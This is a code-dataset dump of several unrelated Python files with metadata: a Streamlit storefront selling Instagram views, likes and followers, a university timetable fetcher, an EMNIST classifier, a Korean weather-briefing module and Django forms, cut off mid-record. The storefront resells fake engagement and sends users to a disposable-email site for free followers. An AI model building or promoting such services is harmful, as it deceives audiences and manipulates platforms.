Plans\")\t\n\t\tplann=st.selectbox(\"\",(\"Views\",\"No_Refill-Followers\",\"Refill-Followers\",\"Likes\",\"Free_Followers\"))\n\t\tif plann == \"Views\":\n\t\t\tst.write(\"https://socialdaddy.in/default.aspx?cat=55\")\n\t\t\tst.write(\"Select this -> 1.Insagram Views 2.Instagram Likes [15k] [Working After Update]- 57 INR\")\n\t\telif plann == \"No_Refill-Followers\":\n\t\t\tst.write(\"https://socialdaddy.in/default.aspx?cat=55\")\n\t\t\tst.write(\"Select this -> 1.Instagram Followers(No-Refill) 2.Instagram Followers Real Mixed [15k]- 130 INR\")\n\t\t\t\n\t\telif plann == \"Refill-Followers\":\n\t\t\tst.write(\"https://socialdaddy.in/default.aspx?cat=55\")\n\t\t\tst.write(\"Select this -> 1.Instagram Followers(Refill) 2.Instagram Followers [Refill 45 Days] [New]- 156 INR\")\n\t\t\t\n\t\telif plann == \"Likes\":\n\t\t\tst.write(\"https://socialdaddy.in/default.aspx?cat=55\")\n\t\t\tst.write(\"Select this -> 1.Instagram Likes 2.Instagram Likes [15k] [Working After Update]- 57 INR\")\n\t\t\t\n\t\telif plann == \"Free_Followers\":\n\t\t\tst.write(\"https://famoid.com/get-free-instagram-followers/\")\n\t\t\tst.write(\"https://temp-mail.org/en/\")\n\t\t\t\n\t\t\t\t\n\ndef normal_user():\n\thead=\"\"\"\n\t\t
\n\t\t

Easy-ViewBot

\t\t\n\t\t
\n\t\t\"\"\"\n\tst.markdown(head,unsafe_allow_html=True)\n\n\ttitle=\"\"\"\n\t\t
\n\t\t

Do you need Views, followers, likes on instagram ?

\n\t\t

We are here to help you

\n\t\t

Increase your social influence in just 4 Steps

\n\t\t
\n\t\t\"\"\"\n\tst.markdown(title,unsafe_allow_html=True)\t\n\tst.subheader(\"\")\n\tst.subheader(\"1. What do you want to increase\")\n\tst.info(\"** Please make your account PUBLIC for sometime if it is PRIVATE\")\n\tvar_a=st.radio(\"\",[\"Views\",\"Followers\",\"Likes\",\"Free Followers\"])\n\tv_dic={1:\"100 Views - 4 INR\",2:\"1000 Views - 5 INR\",3:\"10000 Views - 15 INR\",4:\"100000 Views - 150 INR\"}\n\tif var_a == \"Views\":\n\t\tst.info(\"** Views are only for videos, If no videos exist in your account select other options(Likes, Followers)\")\n\n\t\tst.subheader(\"2. Select the plan\")\n\t\t\n\t\tv_plan=st.radio(\"\",[\"100 Views - 4 INR\",\"1000 Views - 9 INR\",\"10000 Views - 29 INR [Recommended]\",\"100000 Views - 49 INR\"])\n\t\t#st.warning(\"{} is selected\".format(v_plan))\n\t\tst.subheader(\"3. Enter your Phone number and relax, we will contact you shortly\")\n\t\tph_no=st.text_input(\"+91-\")\n\t\tif len(ph_no) == 10:\n\t\t\tst.write(\"\")\n\t\telse:\n\t\t\tst.warning(\"Enter correct phone number\")\n\n\t\tbuff=insta_link(v_plan,ph_no,0)\n\t\t\t\t\t \n\telif var_a == \"Followers\":\n\t\tv_plan=\"\"\n\t\tst.subheader(\"2. Select the plan\")\n\t\tp=st.radio(\"\",[\"No Refill - Followers will not be added if decreased\",\"Refill - Followers will be added again if decreased in next 45 days\"])\n\t\tif p == \"No Refill - Followers will not be added if decreased\":\n\t\t\tv_plan=st.radio(\"\",[\"50 Followers - 9 INR\",\"100 Followers - 16 INR\",\"200 Followers - 32 INR\",\"400 Followers - 49 INR\",\"500 Followers - 63 INR \",\"1,000 Followers - 103 INR [Recommended]\"])\n\t\telif p == \"Refill - Followers will be added again if decreased in next 45 days\":\n\t\t\tv_plan=st.radio(\"\",[\"50 Followers - 13 INR\",\"100 Followers - 24 INR\",\"200 Followers - 44 INR\",\"300 Followers - 66 INR\",\"500 Followers - 99 INR [Recommended]\",\"1000 Followers - 180 INR\"])\n\t\tst.warning(\"{} is selected\".format(v_plan))\n\t\tst.subheader(\"3. Enter your Phone number and relax, we will contact you shortly\")\n\t\tph_no=st.text_input(\"+91-\")\n\t\tif len(ph_no) == 10:\n\t\t\tst.write(\"\")\n\t\telse:\n\t\t\tst.warning(\"Enter correct phone number\")\n\n\t\tbuff=insta_link(v_plan,ph_no,9)\t\t\t \n\t\t#st.warning(\"{} is selected\".format(v_plan))\n\telif var_a == \"Likes\":\n\t\tst.subheader(\"2. Select the plan\")\n\t\t\n\t\tv_plan=st.radio(\"\",[\"100 Likes - 10 INR\",\"200 Likes - 18 INR\",\"300 Likes - 29 INR\",\"400 Likes - 39 INR\",\"500 Likes - 49 INR [Recommended]\",\"1000 Likes - 98 INR\"])\n\t\tst.warning(\"{} is selected\".format(v_plan))\n\t\tst.subheader(\"3. Enter your Phone number and relax, we will contact you shortly\")\n\t\tph_no=st.text_input(\"+91-\")\n\t\tif len(ph_no) == 10:\n\t\t\tst.write(\"\")\n\t\telse:\n\t\t\tst.warning(\"Enter correct phone number\")\n\n\t\tbuff=insta_link(v_plan,ph_no,0)\n\t\t\t\t\t\n\t\t\t\t\t\n\telse:\n\t\tst.subheader(\"2. You will get free Followers.\")\n\t\tst.info(\"We are paying for you. So, that you trust, use and share our website\")\n\t\t\n\t\tv_plan=\"25 Free Followers\"\n\t\tst.warning(\"{} is selected\".format(v_plan))\n\t\tst.subheader(\"3. Enter your Phone number and relax, we will contact you shortly\")\n\t\tph_no=st.text_input(\"+91-\")\n\t\tif len(ph_no) == 10:\n\t\t\tst.write(\"\")\n\t\telse:\n\t\t\tst.warning(\"Enter correct phone number\")\n\n\t\tbuff=insta_link(v_plan,ph_no,1)\n\tst.subheader(\" \")\t\t\t\t\n\t#st.subheader(\"Track your order\")\n\t#st.write(\"\")\n\n\ttrack=\"\"\"\n\t\t
\n\t\t

Track your Order

\n\t\t
\n\t\t\"\"\"\n\tst.markdown(track,unsafe_allow_html=True)\n\n\trow_idd=st.text_input(\"Enter your Tracking ID\")\n\t#st.write(\"This is track id given by user \",row_idd)\n\t\n\tif st.button(\"Track my order\"):\n\t\ttry:\n\t\t\tv_s=view_status(row_idd)\n\t\t\tb=v_s[0]\n\t\t\tif b[0] == \"Success\":\n\t\t\t\tst.success(\"Your order is Successful\")\n\t\t\telse:\n\t\t\t\tst.info(\"Don't Worry, your order is under process. We will let you know when it is finished\")\n\t\texcept:\n\t\t\tst.warning(\"Please enter correct order ID\")\t\n\n\n\t\t\t\n\n\n\n\n\tst.subheader(\" \")\n\tst.subheader(\" \")\n\tst.subheader(\" \")\n\tst.write(\"Contact us - easy-viewbot@protonmail.com\")\n\t\t#st.warning(\"{} is selected\".format(v_plan))\t\n\ndef main():\n\t\n\tadmin_status=st.radio(\"\",[\"Normal User\",\"Admin\"])\n\t#st.write(admin_status)\n\tif admin_status == \"Normal User\":\n\t\t#m,j,k=normal_user()\n\t\tnormal_user()\n\t\t#if len(m)>6:\n\t\t\t#st.write(\"{}, {}, {}\".format(m,j,k))\n\t\t\t\n\t\t\t#st.subheader(\"\")\n\telse:\n\t\tcreate_usertable()\n\t\tadmin()\n\nif __name__ == '__main__':\n main()\n", "sub_path": "viewbot.py", "file_name": "viewbot.py", "file_ext": "py", "file_size_in_byte": 13963, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "sqlite3.connect", "line_number": 5, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 63, "usage_type": "call"}, {"api_name": "streamlit.checkbox", "line_number": 65, "usage_type": "call"}, {"api_name": "streamlit.info", "line_number": 66, "usage_type": "call"}, {"api_name": "streamlit.text_input", "line_number": 76, "usage_type": "call"}, {"api_name": "streamlit.info", "line_number": 77, "usage_type": "call"}, {"api_name": "streamlit.success", "line_number": 78, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 79, "usage_type": "call"}, {"api_name": "streamlit.button", "line_number": 80, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 84, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 90, "usage_type": "call"}, {"api_name": "streamlit.warning", "line_number": 91, "usage_type": "call"}, {"api_name": "streamlit.success", "line_number": 92, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 95, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 96, "usage_type": "call"}, {"api_name": "streamlit.warning", "line_number": 97, "usage_type": "call"}, {"api_name": "streamlit.warning", "line_number": 100, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 105, "usage_type": "call"}, {"api_name": "streamlit.checkbox", "line_number": 106, "usage_type": "call"}, {"api_name": "streamlit.info", "line_number": 107, "usage_type": "call"}, {"api_name": "streamlit.text_input", "line_number": 119, "usage_type": "call"}, {"api_name": "streamlit.info", "line_number": 120, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 124, "usage_type": "call"}, {"api_name": "streamlit.button", "line_number": 125, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 129, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 135, "usage_type": "call"}, {"api_name": "streamlit.warning", "line_number": 136, "usage_type": "call"}, {"api_name": "streamlit.success", "line_number": 137, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 146, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 147, "usage_type": "call"}, {"api_name": "streamlit.warning", "line_number": 148, "usage_type": "call"}, {"api_name": "streamlit.warning", "line_number": 151, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 154, "usage_type": "call"}, {"api_name": "streamlit.checkbox", "line_number": 156, "usage_type": "call"}, {"api_name": "streamlit.info", "line_number": 157, "usage_type": "call"}, {"api_name": "streamlit.text_input", "line_number": 167, "usage_type": "call"}, {"api_name": "streamlit.info", "line_number": 168, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 170, "usage_type": "call"}, {"api_name": "streamlit.button", "line_number": 171, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 175, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 181, "usage_type": "call"}, {"api_name": "streamlit.warning", "line_number": 182, "usage_type": "call"}, {"api_name": "streamlit.success", "line_number": 183, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 192, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 193, "usage_type": "call"}, {"api_name": "streamlit.warning", "line_number": 194, "usage_type": "call"}, {"api_name": "streamlit.warning", "line_number": 197, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 200, "usage_type": "call"}, {"api_name": "streamlit.warning", "line_number": 201, "usage_type": "call"}, {"api_name": "streamlit.info", "line_number": 202, "usage_type": "call"}, {"api_name": "streamlit.text_input", "line_number": 203, "usage_type": "call"}, {"api_name": "streamlit.text_input", "line_number": 204, "usage_type": "call"}, {"api_name": "streamlit.success", "line_number": 206, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 207, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 208, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 211, "usage_type": "call"}, {"api_name": "streamlit.dataframe", "line_number": 213, "usage_type": "call"}, {"api_name": "streamlit.dataframe", "line_number": 217, "usage_type": "call"}, {"api_name": "streamlit.dataframe", "line_number": 220, "usage_type": "call"}, {"api_name": "streamlit.dataframe", "line_number": 223, "usage_type": "call"}, {"api_name": "streamlit.dataframe", "line_number": 226, "usage_type": "call"}, {"api_name": "streamlit.button", "line_number": 227, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 229, "usage_type": "call"}, {"api_name": "streamlit.text_input", "line_number": 230, "usage_type": "call"}, {"api_name": "streamlit.button", "line_number": 231, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 235, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 236, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 238, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 239, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 241, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 242, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 245, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 246, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 249, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 250, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 253, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 254, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 264, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 273, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 274, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 275, "usage_type": "call"}, {"api_name": "streamlit.info", "line_number": 276, "usage_type": "call"}, {"api_name": "streamlit.radio", "line_number": 277, "usage_type": "call"}, {"api_name": "streamlit.info", "line_number": 280, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 282, "usage_type": "call"}, {"api_name": "streamlit.radio", "line_number": 284, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 286, "usage_type": "call"}, {"api_name": "streamlit.text_input", "line_number": 287, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 289, "usage_type": "call"}, {"api_name": "streamlit.warning", "line_number": 291, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 297, "usage_type": "call"}, {"api_name": "streamlit.radio", "line_number": 298, "usage_type": "call"}, {"api_name": "streamlit.radio", "line_number": 300, "usage_type": "call"}, {"api_name": "streamlit.radio", "line_number": 302, "usage_type": "call"}, {"api_name": "streamlit.warning", "line_number": 303, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 304, "usage_type": "call"}, {"api_name": "streamlit.text_input", "line_number": 305, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 307, "usage_type": "call"}, {"api_name": "streamlit.warning", "line_number": 309, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 314, "usage_type": "call"}, {"api_name": "streamlit.radio", "line_number": 316, "usage_type": "call"}, {"api_name": "streamlit.warning", "line_number": 317, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 318, "usage_type": "call"}, {"api_name": "streamlit.text_input", "line_number": 319, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 321, "usage_type": "call"}, {"api_name": "streamlit.warning", "line_number": 323, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 329, "usage_type": "call"}, {"api_name": "streamlit.info", "line_number": 330, "usage_type": "call"}, {"api_name": "streamlit.warning", "line_number": 333, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 334, "usage_type": "call"}, {"api_name": "streamlit.text_input", "line_number": 335, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 337, "usage_type": "call"}, {"api_name": "streamlit.warning", "line_number": 339, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 342, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 351, "usage_type": "call"}, {"api_name": "streamlit.text_input", "line_number": 353, "usage_type": "call"}, {"api_name": "streamlit.button", "line_number": 356, "usage_type": "call"}, {"api_name": "streamlit.success", "line_number": 361, "usage_type": "call"}, {"api_name": "streamlit.info", "line_number": 363, "usage_type": "call"}, {"api_name": "streamlit.warning", "line_number": 365, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 373, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 374, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 375, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 376, "usage_type": "call"}, {"api_name": "streamlit.radio", "line_number": 381, "usage_type": "call"}]} +{"seq_id": "137527318", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport click\nimport requests\n\n@click.command()\n@click.argument('surname')\n@click.argument('name')\n@click.argument('patronymic')\ndef get_shedule(surname,name,patronymic):\n person = 'https://ruz.hse.ru/api/search?term='+surname+' '+name+' '+patronymic+'&type=person'\n r1 = requests.get(person)\n\n prepod_id = r1.json()[0]['id']\n shedule = 'https://ruz.hse.ru/api/schedule/person/' + prepod_id + '?start=2020.09.20&finish=2020.09.30&lng = 1'\n r2 = requests.get(shedule)\n s = r2.json()\n for i in range(len(s)):\n print(str(i + 1) + ') ' + s[i]['date'] + ' ' + s[i]['dayOfWeekString'] + ' ' + s[i]['discipline'])\n print(s[i]['beginLesson'] + ' - ' + s[i]['endLesson'])\n print(s[i]['building'] + ' ' + s[i]['auditorium'])\n print(s[i]['group'])\n print('\\n')\n\nif __name__ == '__main__':\n get_shedule()\n", "sub_path": "doobalueva.py", "file_name": "doobalueva.py", "file_ext": "py", "file_size_in_byte": 898, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "requests.get", "line_number": 13, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 17, "usage_type": "call"}, {"api_name": "click.command", "line_number": 7, "usage_type": "call"}, {"api_name": "click.argument", "line_number": 8, "usage_type": "call"}, {"api_name": "click.argument", "line_number": 9, "usage_type": "call"}, {"api_name": "click.argument", "line_number": 10, "usage_type": "call"}]} +{"seq_id": "257590013", "text": "'''Trains a simple deep NN on the MNIST dataset.\nGets to 98.40% test accuracy after 20 epochs\n(there is *a lot* of margin for parameter tuning).\n2 seconds per epoch on a K520 GPU.\n'''\n\nfrom __future__ import print_function\n\nimport tensorflow as tf\nfrom tensorflow.keras.datasets import mnist\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Dropout\nfrom tensorflow.keras.optimizers import RMSprop\n\n'''Importing the EMNIST letters'''\nfrom scipy import io as sio\n\nbatch_size = 128\nnum_classes = 26\nepochs = 20\n\n# the data, split between train and test sets\n# (x_train, y_train), (x_test, y_test) = mnist.load_data()\n\n# x_train = x_train.reshape(60000, 784)\n# x_test = x_test.reshape(10000, 784)\n# x_train = x_train.astype('float32')\n# x_test = x_test.astype('float32')\n# x_train /= 255\n# x_test /= 255\n# print(x_train.shape[0], 'train samples')\n# print(x_test.shape[0], 'test samples')\n\n# # convert class vectors to binary class matrices\n# y_train = tf.keras.utils.to_categorical(y_train, num_classes)\n# y_test = tf.keras.utils.to_categorical(y_test, num_classes)\n\n\n# # https://stackoverflow.com/questions/51125969/loading-emnist-letters-dataset/53547262#53547262\nmat = sio.loadmat('emnist-letters.mat')\ndata = mat['dataset']\n\nx_train = data['train'][0,0]['images'][0,0]\ny_train = data['train'][0,0]['labels'][0,0]\nx_test = data['test'][0,0]['images'][0,0]\ny_test = data['test'][0,0]['labels'][0,0]\n\nval_start = x_train.shape[0] - x_test.shape[0]\nx_val = x_train[val_start:x_train.shape[0],:]\ny_val = y_train[val_start:x_train.shape[0]]\nx_train = x_train[0:val_start,:]\ny_train = y_train[0:val_start]\n\n\n# convert class vectors to binary class matrices\ny_train = tf.keras.utils.to_categorical(y_train - 1, num_classes, dtype='float32')\ny_test = tf.keras.utils.to_categorical(y_test - 1, num_classes, dtype='float32')\n\ny_val = tf.keras.utils.to_categorical(y_val - 1, num_classes, dtype='float32')\n\nmodel = Sequential()\nmodel.add(Dense(512, activation='relu', input_shape=(784,)))\nmodel.add(Dropout(0.2))\nmodel.add(Dense(512, activation='relu'))\nmodel.add(Dropout(0.2))\nmodel.add(Dense(num_classes, activation='softmax'))\n\nmodel.summary()\n\nmodel.compile(loss='categorical_crossentropy',\n optimizer=RMSprop(),\n metrics=['accuracy'])\n\nhistory = model.fit(x_train, y_train,\n batch_size=batch_size,\n epochs=epochs,\n verbose=1,\n validation_data=(x_test, y_test))\nscore = model.evaluate(x_test, y_test, verbose=0)\nprint('Test loss:', score[0])\nprint('Test accuracy:', score[1])", "sub_path": "Baseline(Example).py", "file_name": "Baseline(Example).py", "file_ext": "py", "file_size_in_byte": 2610, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "scipy.io.loadmat", "line_number": 40, "usage_type": "call"}, {"api_name": "scipy.io", "line_number": 40, "usage_type": "name"}, {"api_name": "tensorflow.keras.utils.to_categorical", "line_number": 56, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 56, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.utils.to_categorical", "line_number": 57, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 57, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.utils.to_categorical", "line_number": 59, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 59, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.models.Sequential", "line_number": 61, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 62, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dropout", "line_number": 63, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 64, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dropout", "line_number": 65, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 66, "usage_type": "call"}, {"api_name": "tensorflow.keras.optimizers.RMSprop", "line_number": 71, "usage_type": "call"}]} +{"seq_id": "549676220", "text": "from datetime import *\nfrom util import db\nfrom . import location\nimport random\nfrom weather.corona import Corona\n\n\ncorona = Corona()\n\n\ndef get_json(input_json):\n if 'customerCode' in input_json:\n input_json['CUSTOMER_CODE'] = input_json['customerCode']\n\n _db = db.get_db('weather', 'inbi', 'weather')\n\n city, district = location.get_location(input_json)\n\n cr = _db.select_one(\n sql_text=\"SELECT * FROM weather.weather_present WHERE (city='{0}' and district='{1}');\".format(city, district)\n )\n\n td = _db.select_one(\n sql_text=\"SELECT * FROM weather.weather_forecast WHERE (city='{0}' and district='{1}' and date='{2}');\".format(\n city, district, date.today().isoformat()\n )\n )\n\n yt = _db.select_one(\n sql_text=\"SELECT * FROM weather.weather_forecast WHERE (city='{0}' and district='{1}' and date='{2}');\".format(\n city, district, (date.today() - timedelta(days=1)).isoformat()\n )\n )\n\n degree = int((td['low_temp'] + td['high_temp'] - yt['low_temp'] - yt['high_temp']) / 2)\n if degree < 0:\n differ = '낮'\n degree *= -1\n else:\n differ = '높'\n\n sentence = '{} 오늘은 {}월 {}일 {}요일이에요. ' \\\n '{}현재 {} {}의 날씨는 {}, 기온은 {}도이며, 미세먼지 지수는 {}이에요. ' \\\n '오늘 최저기온은 {}도, 최고기온은 {}도로 {} 것 같아요. '\\\n .format(\n random.choice([\"안녕히 주무셨어요?\", \"좋은 아침이에요.\"]),\n datetime.today().month, datetime.today().day, \"월화수목금토일\"[datetime.today().weekday()],\n city_is(city, district), city, district, get_status(cr['weather_status']), ondo(cr['temp']),\n cr['dust'], ondo(td['low_temp']), ondo(td['high_temp']), get_reason(degree, differ),\n )\n\n if input_json['CUSTOMER_CODE'] == 'isolation':\n sentence += '오늘 0시 기준 코로나19 확진자는 {}명, 완치자는 {}명이에요.'.format(\n corona.ill, corona.cured\n )\n\n # 안녕히 주무셨어요? / 날짜 알려주고 / 날씨 알려주고\n return {\n 'sentence': sentence,\n 'year': datetime.today().year,\n 'month': datetime.today().month,\n 'day': datetime.today().day,\n 'city': city,\n 'district': district,\n 'temp': cr['temp'],\n 'status': cr['weather_status'],\n 'dust': cr['dust'],\n 'low_temp': td['low_temp'],\n 'high_temp': td['high_temp'],\n 'am_rain': td['am_rain'],\n 'pm_rain': td['pm_rain'],\n 'differ': differ,\n 'degree': degree\n }\n\n\ndef ondo(temp):\n if temp >= 0:\n return str(temp)\n else:\n return \"영하 %d\" % (temp * -1)\n\n\ndef city_is(city, district):\n if city == '서울' and district == '종로구':\n return '지역 설정이 제대로 되어있지 않아 서울 날씨로 알려 드릴게요. '\n else:\n return ''\n\n\ndef get_status(s):\n if '맑음' in s:\n return '맑고'\n elif '흐림' in s:\n return '흐리고'\n elif '구름많음' in s:\n return '구름이 많고'\n elif '비' in s:\n return '비가 오고'\n elif '눈' in s:\n return '눈이 오고'\n else:\n return s\n\n\ndef get_reason(deg, dif):\n if deg > 0:\n return '어제보다 %d도 가량 %s을' % (deg, dif)\n elif deg == 0:\n return '어제와 비슷할'\n\n\nif __name__ == '__main__':\n print(get_json({'location': '서울 송파구'})['sentence'])\n", "sub_path": "weather/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 3548, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "weather.corona.Corona", "line_number": 8, "usage_type": "call"}, {"api_name": "util.db.get_db", "line_number": 15, "usage_type": "call"}, {"api_name": "util.db", "line_number": 15, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 46, "usage_type": "call"}, {"api_name": "datetime.today", "line_number": 47, "usage_type": "call"}, {"api_name": "datetime.today", "line_number": 60, "usage_type": "call"}, {"api_name": "datetime.today", "line_number": 61, "usage_type": "call"}, {"api_name": "datetime.today", "line_number": 62, "usage_type": "call"}]} +{"seq_id": "84847099", "text": "from django import forms\nfrom django.contrib.auth.models import User\nfrom django.db import transaction\nfrom .models import *\nfrom django.core.exceptions import NON_FIELD_ERRORS\nfrom django.contrib.auth.forms import UserCreationForm\n\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Layout, Fieldset, ButtonHolder, Submit, Field\n\nclass UserForm(forms.ModelForm):\n\t\n\tclass Meta:\n\t\tmodel = User\n\t\tfields = ('username','email','password') \n\n# class InternProfileForm(forms.ModelForm):\n# \tclass Meta:\n# \t\tmodel = InternProfile\n# \t\tfields = ['bio','location']\n\nclass PersonalDetailsForm(forms.ModelForm):\n\temail = forms.CharField(label=\"Email ID\")\n\tcontact_number = forms.RegexField(label=\"Mobile Number\",regex=r'^\\+?1?\\d{9,15}$',error_messages = {'invalid':\"Phone number must be entered in the format: '9999999999'. Up to 10 digits allowed.\"})\n\tsecond_city = forms.CharField(label=\"2 city\")\n\tdef __init__(self, *args, **kwargs):\n\t\t\tsuper(PersonalDetailsForm, self).__init__(*args, **kwargs)\n\t\t\tself.helper = FormHelper()\n\t\t\tself.helper.form_method = 'POST'\n\t\t\tself.helper.form_class = 'form-horizontal'\n\t\t\tself.helper.label_class = 'col-md-2' \n\t\t\tself.helper.field_class = 'col-md-8'\n\t\t\tself.helper.layout = Layout(\n\t\t\t\tField('name'),\n\t\t\t\tField('email'),\n\t\t\t\tField('contact_number'),\n\t\t\t\tField('current_city'),\n\t\t\t\tField('second_city'),\n\t\t\t\t\n\t\t\t)\n\t\t\t\n\t\t\tsuper(PersonalDetailsForm, self).__init__(*args, **kwargs)\n\tclass Meta:\n\t\tmodel = PersonalDetails\n\t\tfields = ['name','email','contact_number','current_city','second_city']\n\t\t\n\t\t\t\nclass AcademicDetailsForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = AcademicDetails \n\t\tfields = ['schoolname_10','percentage_10','marksheet_10','schoolname_12','percentage_12','marksheet_12', 'college_name','current_year','cpi','marksheet_clg']\n\t\tdef __init__(self, *args, **kwargs):\n\t\t\tsuper(PersonalDetailsForm, self).__init__(*args, **kwargs)\n\t\t\tself.helper.form_method = 'POST'\n\t\t\tself.helper.form_class = 'form-horizontal'\n\t\t\tself.helper.label_class = 'control-label col-sm-5'\n\t\t\tself.helper.field_class = 'form-control'\n\t\t\tself.helper.layout = Layout(\n\t\t\t\tField('schoolname_10'),\n\t\t\t\tField('percentage_10'),\n\t\t\t\tField('marksheet_10'),\n\t\t\t\tField('schoolname_12'),\n\t\t\t\tField('schoolname_12'),\n\t\t\t\tField('marksheet_12'),\n\t\t\t\tField('college_name'),\n\t\t\t\tField('current_year'),\n\t\t\t\tField('cpi'),\n\t\t\t\tField('marksheet_clg'),\n\t\t\t\t\n\t\t\t)\n\t\t\t\n\t\t\tsuper(AcademicDetailsForm, self).__init__(*args, **kwargs)\n\nclass ProjectDetailsForm(forms.ModelForm):\n\tproject_link = forms.URLField(required = False)\n\tclass Meta:\n\t\tmodel = ProjectDetails\n\t\tfields = ['title','typeof_project','description','project_link']\n\t\tdef __init__(self, *args, **kwargs):\n\t\t\tsuper(PersonalDetailsForm, self).__init__(*args, **kwargs)\n\t\t\tself.helper.form_method = 'POST'\n\t\t\tself.helper.form_class = 'form-horizontal'\n\t\t\tself.helper.label_class = 'control-label col-sm-5'\n\t\t\tself.helper.field_class = 'form-control'\n\t\t\tself.helper.layout = Layout(\n\t\t\t\tField('title', css_class='input-sm'),\n\t\t\t\tField('typeof_project', css_class='input-sm'),\n\t\t\t\tField('conatact_number', css_class='input-sm'),\n\t\t\t\tField('description', css_class='input-sm'),\n\t\t\t\tField('project_link', css_class='input-sm'),\n\t\t\t\t\n\t\t\t)\n\t\t\tsuper(ProjectDetailsForm, self).__init__(*args, **kwargs)\n\nclass InternSignUpForm(UserCreationForm):\n\tclass Meta(UserCreationForm.Meta):\n\t\tmodel = User\n\n\tdef save(self):\n\t\tuser = super().save()\n\t\tprint('VALID')\n\t\tuser.is_company = True\n\n\t\tuser.save()\n\t\tprint('VALID1234')\n\t\tinternprofile = InternProfile.objects.create(user=user)\n\t\t#internprofile.interests.add(*self.cleaned_data.get('interests'))\n\t\treturn user\t\n\nclass FilterForm(forms.Form):\n\tlocation = forms.CharField(label=\"Choose City\")\n\ttechnology = forms.CharField(label=\"Choose technology\")\n\tstipend = forms.BooleanField(label=\"Stipend\")", "sub_path": "intern/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 3815, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "django.forms.ModelForm", "line_number": 11, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 11, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User", "line_number": 14, "usage_type": "name"}, 